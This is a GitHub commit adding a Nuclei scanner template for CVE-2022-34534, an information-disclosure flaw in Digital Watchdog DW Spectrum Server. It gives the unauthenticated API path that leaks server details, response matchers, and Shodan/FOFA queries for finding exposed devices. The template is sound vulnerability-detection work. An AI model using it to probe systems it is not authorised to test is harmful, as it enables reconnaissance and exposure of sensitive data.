Merge pull request #9899 from projectdiscovery/CVE-2022-34534

Create CVE-2022-34534.yaml
patch-2
Dhiyaneshwaran 2024-05-28 13:45:26 +05:30 committed by GitHub
commit f81a510a6c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: CVE-2022-34534
info:
name: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure
author: ritikchaddha
severity: high
description: |
Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.
reference:
- https://gist.github.com/secgrant/820faeeaa0cb4889edaa1d6fef83deab
- https://nvd.nist.gov/vuln/detail/CVE-2022-34534
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34534
cwe-id: CWE-200
epss-score: 0.0015
epss-percentile: 0.51136
cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dw
product: spectrum_server_firmware
shodan-query: http.favicon.hash:868509217
fofa-query: icon_hash="868509217"
tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure
http:
- method: GET
path:
- "{{BaseURL}}/api/moduleInformation"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "name\":", "cloudHost\":", "remoteAddresses")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and